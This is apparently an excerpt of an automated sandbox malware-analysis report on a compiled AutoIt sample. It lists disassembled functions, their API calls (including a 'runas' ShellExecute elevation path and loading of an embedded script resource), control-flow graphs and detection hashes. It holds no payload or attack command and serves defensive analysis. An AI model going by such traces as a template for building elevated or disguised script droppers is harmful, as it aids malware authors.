                                    • SetCurrentDirectoryW.KERNEL32(?,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D06
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A1DAB4,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D89
                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00983AA3), ref: 009F1D90
                                      • Part of subcall function 00983E6E: GetSysColorBrush.USER32(0000000F), ref: 00983E79
                                      • Part of subcall function 00983E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
                                      • Part of subcall function 00983E6E: LoadIconW.USER32(00000063), ref: 00983E9E
                                      • Part of subcall function 00983E6E: LoadIconW.USER32(000000A4), ref: 00983EB0
                                      • Part of subcall function 00983E6E: LoadIconW.USER32(000000A2), ref: 00983EC2
                                      • Part of subcall function 00983E6E: RegisterClassExW.USER32(?), ref: 00983F30
                                      • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                      • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                      • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                      • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                      • Part of subcall function 00984FFC: _memset.LIBCMT ref: 00985022
                                      • Part of subcall function 00984FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                    Strings
                                    • This is a third-party compiled AutoIt script., xrefs: 009F1CC8
                                    • runas, xrefs: 009F1D84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 438480954-3287110873
                                    • Opcode ID: 86e8a5019732dca6a3eb1a22542e7022cb4b0a0e517d5c4fdcb7ebd9e47b6c14
                                    • Instruction ID: 096e58533d10d55ff2e4b97846c00ab6f250efa26f91c305b043d01be4ddb281
                                    • Opcode Fuzzy Hash: 86e8a5019732dca6a3eb1a22542e7022cb4b0a0e517d5c4fdcb7ebd9e47b6c14
                                    • Instruction Fuzzy Hash: FC510539A44248BBCB11FBF8DC45FED7B79AFC6B00F008169F21166292DB754686CB21
                                    Function 00983742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1170 983742-983762 1172 9837c2-9837c4 1170->1172 1173 983764-983767 1170->1173 1172->1173 1174 9837c6 1172->1174 1175 9837c8 1173->1175 1176 983769-983770 1173->1176 1177 9837ab-9837b3 NtdllDefWindowProc_W 1174->1177 1178 9837ce-9837d1 1175->1178 1179 9f1e00-9f1e2e call 982ff6 call 99e312 1175->1179 1180 98382c-983834 PostQuitMessage 1176->1180 1181 983776-98377b 1176->1181 1185 9837b9-9837bf 1177->1185 1186 9837d3-9837d4 1178->1186 1187 9837f6-98381d SetTimer RegisterClipboardFormatW 1178->1187 1213 9f1e33-9f1e3a 1179->1213 1184 9837f2-9837f4 1180->1184 1182 9f1e88-9f1e9c call 9c4ddd 1181->1182 1183 983781-983783 1181->1183 1182->1184 1207 9f1ea2 1182->1207 1190 983789-98378e 1183->1190 1191 983836-983845 call 99eb83 1183->1191 1184->1185 1194 9837da-9837ed KillTimer call 983847 call 98390f 1186->1194 1195 9f1da3-9f1da6 1186->1195 1187->1184 1192 98381f-98382a CreatePopupMenu 1187->1192 1197 9f1e6d-9f1e74 1190->1197 1198 983794-983799 1190->1198 1191->1184 1192->1184 1194->1184 1201 9f1ddc-9f1dfb MoveWindow 1195->1201 1202 9f1da8-9f1daa 1195->1202 1197->1177 1212 9f1e7a-9f1e83 call 9ba5f3 1197->1212 1205 9f1e58-9f1e68 call 9c55bd 1198->1205 1206 98379f-9837a5 1198->1206 1201->1184 1209 9f1dac-9f1daf 1202->1209 1210 9f1dcb-9f1dd7 SetFocus 1202->1210 1205->1184 1206->1177 1206->1213 1207->1177 1209->1206 1214 9f1db5-9f1dc6 call 982ff6 1209->1214 1210->1184 1212->1177 1213->1177 1219 9f1e40-9f1e53 call 983847 call 984ffc 1213->1219 1214->1184 1219->1177
                                    APIs
                                    • NtdllDefWindowProc_W.USER32(?,?,?,?), ref: 009837B3
                                    • KillTimer.USER32(?,00000001), ref: 009837DD
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00983800
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0098380B
                                    • CreatePopupMenu.USER32 ref: 0098381F
                                    • PostQuitMessage.USER32(00000000), ref: 0098382E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: ef36ba5c0971d640ac3ba725e52145ed5ee3f3477fa5b2e302c9342404b49082
                                    • Instruction ID: 4b21c289fb60767d3d8893e6c6a78609f198a5921c8b2e04e643a71ef0b5d33c
                                    • Opcode Fuzzy Hash: ef36ba5c0971d640ac3ba725e52145ed5ee3f3477fa5b2e302c9342404b49082
                                    • Instruction Fuzzy Hash: 0F415DFA114249E7DB14FFA8EC4AF793A59F7C1B00F008515F602D2391DB69DD928761
                                    Function 0099DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1234 99ddc0-99de4f call 98d7f7 GetVersionExW call 986a63 call 99dfb4 call 986571 1243 9f24c8-9f24cb 1234->1243 1244 99de55-99de56 1234->1244 1245 9f24cd 1243->1245 1246 9f24e4-9f24e8 1243->1246 1247 99de58-99de63 1244->1247 1248 99de92-99dea2 call 99df77 1244->1248 1250 9f24d0 1245->1250 1251 9f24ea-9f24f3 1246->1251 1252 9f24d3-9f24dc 1246->1252 1253 99de69-99de6b 1247->1253 1254 9f244e-9f2454 1247->1254 1263 99dea4-99dec1 GetCurrentProcess call 99df5f 1248->1263 1264 99dec7-99dee1 1248->1264 1250->1252 1251->1250 1260 9f24f5-9f24f8 1251->1260 1252->1246 1255 9f2469-9f2475 1253->1255 1256 99de71-99de74 1253->1256 1258 9f245e-9f2464 1254->1258 1259 9f2456-9f2459 1254->1259 1265 9f247f-9f2485 1255->1265 1266 9f2477-9f247a 1255->1266 1261 99de7a-99de89 1256->1261 1262 9f2495-9f2498 1256->1262 1258->1248 1259->1248 1260->1252 1267 9f248a-9f2490 1261->1267 1268 99de8f 1261->1268 1262->1248 1269 9f249e-9f24b3 1262->1269 1263->1264 1286 99dec3 1263->1286 1271 99df31-99df3b GetSystemInfo 1264->1271 1272 99dee3-99def7 call 99e00c 1264->1272 1265->1248 1266->1248 1267->1248 1268->1248 1273 9f24bd-9f24c3 1269->1273 1274 9f24b5-9f24b8 1269->1274 1276 99df0e-99df1a 1271->1276 1281 99df29-99df2f GetSystemInfo 1272->1281 1282 99def9-99df01 call 99dff4 GetNativeSystemInfo 1272->1282 1273->1248 1274->1248 1278 99df1c-99df1f FreeLibrary 1276->1278 1279 99df21-99df26 1276->1279 1278->1279 1285 99df03-99df07 1281->1285 1282->1285 1285->1276 1288 99df09-99df0c FreeLibrary 1285->1288 1286->1264 1288->1276
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0099DDEC
                                    • GetCurrentProcess.KERNEL32(00000000,00A1DC38,?,?), ref: 0099DEAC
                                    • GetNativeSystemInfo.KERNELBASE(?,00A1DC38,?,?), ref: 0099DF01
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF0C
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF1F
                                    • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF29
                                    • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF35
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                    • String ID:
                                    • API String ID: 3851250370-0
                                    • Opcode ID: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                    • Instruction ID: a466e65408f8131aa8b927271b4ddcf02acd35d0042e1b3aafd9a8d264f2e13d
                                    • Opcode Fuzzy Hash: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                    • Instruction Fuzzy Hash: B761C4B180A388DFCF15CFA898C12EDBFB86F69300B1949D9D8459F247C674C909CB65
                                    Function 0098406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1336 98406b-984083 CreateStreamOnHGlobal 1337 9840a3-9840a6 1336->1337 1338 984085-98409c FindResourceExW 1336->1338 1339 9f4f16-9f4f25 LoadResource 1338->1339 1340 9840a2 1338->1340 1339->1340 1341 9f4f2b-9f4f39 SizeofResource 1339->1341 1340->1337 1341->1340 1342 9f4f3f-9f4f4a LockResource 1341->1342 1342->1340 1343 9f4f50-9f4f6e 1342->1343 1343->1340
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0098449E,?,?,00000000,00000001), ref: 0098407B
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0098449E,?,?,00000000,00000001), ref: 00984092
                                    • LoadResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F1A
                                    • SizeofResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F2F
                                    • LockResource.KERNEL32(0098449E,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB,00000000), ref: 009F4F42
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                    • Instruction ID: af0f14ed296a4577cbdafe69b1ce330bddeebf9f221bcb8657fd5c1eac2073ce
                                    • Opcode Fuzzy Hash: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                    • Instruction Fuzzy Hash: 49111871200705BFE7219BA5EC48F677BBDEFC9B51F10856CB602962A0DA61DC028A20
                                    Function 009C6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,009F2F49), ref: 009C6CB9
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 009C6CCA
                                    • FindClose.KERNEL32(00000000), ref: 009C6CDA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                    • Instruction ID: 0fc9a51198656abdd5c447e36c9af889ebc1a57deb83fa0739a7663af89a0024
                                    • Opcode Fuzzy Hash: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                    • Instruction Fuzzy Hash: 33E0D832C1041457C210A7B8EC0D8EA376CDE05339F100709F5F1C11D0EB74D91145D6
                                    Function 0098E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098E959
                                    • timeGetTime.WINMM ref: 0098EBFA
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098ED2E
                                    • TranslateMessage.USER32(?), ref: 0098ED3F
                                    • DispatchMessageW.USER32(?), ref: 0098ED4A
                                    • LockWindowUpdate.USER32(00000000), ref: 0098ED79
                                    • DestroyWindow.USER32 ref: 0098ED85
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0098ED9F
                                    • Sleep.KERNEL32(0000000A), ref: 009F5270
                                    • TranslateMessage.USER32(?), ref: 009F59F7
                                    • DispatchMessageW.USER32(?), ref: 009F5A05
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009F5A19
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 2641332412-570651680
                                    • Opcode ID: c3276ebc7ae281e13c58f0770f46279d712555d636d97bdf3e3f0e436a582b35
                                    • Instruction ID: ddbcdbccd4d9a57dcbd36e3f816cd8fd13babe584cfeecd3360aa48b91130e27
                                    • Opcode Fuzzy Hash: c3276ebc7ae281e13c58f0770f46279d712555d636d97bdf3e3f0e436a582b35
                                    • Instruction Fuzzy Hash: 4562E270508344DFDB24EF64C895BAA77E8BF84304F04496DFA8A8B392DB75D849CB52
                                    Function 009B5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___createFile.LIBCMT ref: 009B5EC3
                                    • ___createFile.LIBCMT ref: 009B5F04
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F2D
                                    • __dosmaperr.LIBCMT ref: 009B5F34
                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F47
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 009B5F6A
                                    • __dosmaperr.LIBCMT ref: 009B5F73
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B5F7C
                                    • __set_osfhnd.LIBCMT ref: 009B5FAC
                                    • __lseeki64_nolock.LIBCMT ref: 009B6016
                                    • __close_nolock.LIBCMT ref: 009B603C
                                    • __chsize_nolock.LIBCMT ref: 009B606C
                                    • __lseeki64_nolock.LIBCMT ref: 009B607E
                                    • __lseeki64_nolock.LIBCMT ref: 009B6176
                                    • __lseeki64_nolock.LIBCMT ref: 009B618B
                                    • __close_nolock.LIBCMT ref: 009B61EB
                                      • Part of subcall function 009AEA9C: CloseHandle.KERNELBASE(00000000,00A2EEF4,00000000,?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAEC
                                      • Part of subcall function 009AEA9C: GetLastError.KERNEL32(?,009B6041,00A2EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009AEAF6
                                      • Part of subcall function 009AEA9C: __free_osfhnd.LIBCMT ref: 009AEB03
                                      • Part of subcall function 009AEA9C: __dosmaperr.LIBCMT ref: 009AEB25
                                      • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                    • __lseeki64_nolock.LIBCMT ref: 009B620D
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 009B6342
                                    • ___createFile.LIBCMT ref: 009B6361
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 009B636E
                                    • __dosmaperr.LIBCMT ref: 009B6375
                                    • __free_osfhnd.LIBCMT ref: 009B6395
                                    • __invoke_watson.LIBCMT ref: 009B63C3
                                    • __wsopen_helper.LIBCMT ref: 009B63DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                    • String ID: @
                                    • API String ID: 3896587723-2766056989
                                    • Opcode ID: b3f6a9b24576e08ccaa14634e6f1cc99b7f817f54e3bfaec1b11c197d8654e3f
                                    • Instruction ID: f30e348cdd8ce608957533b3f117343ea6dde93db703560728912c43a01fb4df
                                    • Opcode Fuzzy Hash: b3f6a9b24576e08ccaa14634e6f1cc99b7f817f54e3bfaec1b11c197d8654e3f
                                    • Instruction Fuzzy Hash: 092245719046099BEF299FA8DE45BFD7B75EB81330F294228E521DB2D2C3399D40CB91
                                    Function 009AEE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __getptd_noexit
                                    • String ID:
                                    • API String ID: 3074181302-0
                                    • Opcode ID: 4ba39637066fdc9579335a8c51e6591fc22567d6f415b67531d1ca04a6110f1c
                                    • Instruction ID: 3e376ce8dd8c115fce2f1edf19ceaa19b00188e9bee1c8988715864a64f5079b
                                    • Opcode Fuzzy Hash: 4ba39637066fdc9579335a8c51e6591fc22567d6f415b67531d1ca04a6110f1c
                                    • Instruction Fuzzy Hash: A3322775E042459FDB21CFE8C850BBDBBB5AF87314F24446AE8959B293C7349842CBE0
                                    Function 009CFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • _wcscpy.LIBCMT ref: 009CFA96
                                    • _wcschr.LIBCMT ref: 009CFAA4
                                    • _wcscpy.LIBCMT ref: 009CFABB
                                    • _wcscat.LIBCMT ref: 009CFACA
                                    • _wcscat.LIBCMT ref: 009CFAE8
                                    • _wcscpy.LIBCMT ref: 009CFB09
                                    • __wsplitpath.LIBCMT ref: 009CFBE6
                                    • _wcscpy.LIBCMT ref: 009CFC0B
                                    • _wcscpy.LIBCMT ref: 009CFC1D
                                    • _wcscpy.LIBCMT ref: 009CFC32
                                    • _wcscat.LIBCMT ref: 009CFC47
                                    • _wcscat.LIBCMT ref: 009CFC59
                                    • _wcscat.LIBCMT ref: 009CFC6E
                                      • Part of subcall function 009CBFA4: _wcscmp.LIBCMT ref: 009CC03E
                                      • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC083
                                      • Part of subcall function 009CBFA4: _wcscpy.LIBCMT ref: 009CC096
                                      • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0A9
                                      • Part of subcall function 009CBFA4: __wsplitpath.LIBCMT ref: 009CC0CE
                                      • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0E4
                                      • Part of subcall function 009CBFA4: _wcscat.LIBCMT ref: 009CC0F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                    • String ID: >>>AUTOIT SCRIPT<<<
                                    • API String ID: 2955681530-2806939583
                                    • Opcode ID: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
                                    • Instruction ID: 30ffc2ad4dddda102de060fee24056e28e7111c151633335222ab6f32647a253
                                    • Opcode Fuzzy Hash: 969787d3fbd415c1000169537b15406ac15b6cc227cb0504f44bc35888e2d830
                                    • Instruction Fuzzy Hash: E191A172504705AFDB24EB54C851F9BB3E9BFD8310F04886DF99997292DB30EA44CB92
                                    Function 00983F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00983F86
                                    • RegisterClassExW.USER32(00000030), ref: 00983FB0
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00983FC1
                                    • 6F5133E0.COMCTL32(?), ref: 00983FDE
                                    • 6F522980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00983FEE
                                    • LoadIconW.USER32(000000A9), ref: 00984004
                                    • 6F51C400.COMCTL32(000000FF,00000000), ref: 00984013
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Register$BrushC400ClassClipboardColorF5133F522980FormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2091571104-1005189915
                                    • Opcode ID: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
                                    • Instruction ID: d009801ffee1aff6c344b19ddf33f75c3767d9f04e123eb7b059e843c3188095
                                    • Opcode Fuzzy Hash: cc3e46f20cdb868e5a4c0b138661f102123499bea2259dc99c636f87bf8230ee
                                    • Instruction Fuzzy Hash: 6C21C7B9900318AFDB10DFE4E889BCDBBB4FB49700F01461AF615A62A0D7B545868F91
                                    Function 009CBFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
